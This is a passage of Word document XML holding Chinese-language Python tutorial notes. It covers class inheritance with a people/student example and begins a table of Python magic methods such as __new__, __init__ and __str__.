    <w:p w14:paraId="4779854E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>定义构造方法构造器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFBD57C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    def __init__(self,n,a,w):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2739A8DA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.name = n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0F6C83" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.age = a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC2DC11" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        self.__weight = w</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A816965" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">    def speak(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B50CDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("%s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> %d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>岁。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>" %(self.name,self.age))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BAD3C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>定义单继承类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5B1ED5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>class student(people):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BAAB4A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    grade = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154A34E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    def __init__(self,n,a,w,g):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADBBDCF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>调用父类的构造函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0D83C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>people.__init__(self,n,a,w)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1084E0AE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        self.grade = g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AC2AF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>覆盖写入父类的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF8D83C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    def speak(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448C70D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("%s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> %d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>岁了，我在读</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> %d </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>年级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"%(self.name,self.age,self.grade))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD158BE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s = student('ken',10,60,3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C466829" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s.speak()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2416BF65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B938A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>魔术方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BED933" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F9F4967" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.cnblogs.com/dachenzi/p/8185792.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCFC006" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19066439" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供的魔术方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253FA178" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>魔术方法这里按照不同的类别有如下分类：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15224C5E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FD86878" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>魔法方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2CB7E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>含义</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A972F58" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="05001F6F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本的魔法方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C29E58" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__new__(cls[, ...])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">1. __new__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是在一个对象实例化的时候所调用的第一个方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75417892" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它的第一个参数是这个类，其他的参数是用来直接传递给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> __init__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBB7ABD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3. __new__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>决定是否要使用该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> __init__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> __new__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以调用其他类的构造方法或者直接返回别的实例对象来作为本类的实例，如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> __new__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有返回实例对象，则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> __init__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不会被调用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12608EB0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4. __new__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要是用于继承一个不可变的类型比如一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> tuple </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4EAA51" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__init__(self[, ...])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造器，当一个实例被创建的时候调用的初始化方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE897A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__del__(self)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>析构器，当一个实例被销毁的时候调用的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0DC9CB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__call__(self[, args...])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许一个类的实例像函数一样被调用：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">x(a, b) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> x.__call__(a, b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F031D2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__len__(self)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> len() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用时的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55833C89" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__repr__(self)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> repr() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用或者直接执行对象时的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B630E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__str__(self)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> str() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用或者打印对象时的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367F05A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__bytes__(self)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> bytes() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用时的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4208BB8C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__hash__(self)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用时的行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640FC891" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__bool__(self)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义当被</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> bool() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用时的行为，应该返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> True </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8E534B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__format__(self, format_spec)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
